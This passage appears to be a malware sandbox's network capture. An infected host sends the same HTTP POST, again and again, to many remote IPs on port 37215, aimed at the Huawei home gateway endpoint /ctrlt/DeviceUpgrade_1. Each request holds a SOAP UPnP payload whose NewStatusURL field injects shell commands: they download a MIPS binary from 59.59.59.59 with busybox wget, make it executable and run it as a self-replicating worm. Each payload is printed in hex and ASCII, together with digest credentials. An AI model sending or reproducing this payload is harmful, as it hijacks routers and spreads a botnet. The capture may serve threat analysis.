                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2414192.168.2.153770690.49.147.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.398557901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2415192.168.2.1548266113.67.101.14937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.403402090 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2416192.168.2.155118641.150.4.18137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.403574944 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2417192.168.2.1534482197.47.220.1837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.404089928 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2418192.168.2.153862035.87.127.2937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.408792973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2419192.168.2.1559206197.185.143.8137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.408808947 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2420192.168.2.1555096157.134.97.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.409065962 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2421192.168.2.1537608197.13.125.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.413959026 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2422192.168.2.1546172197.222.99.11937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.414268017 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2423192.168.2.1540480197.215.137.13537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.414298058 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 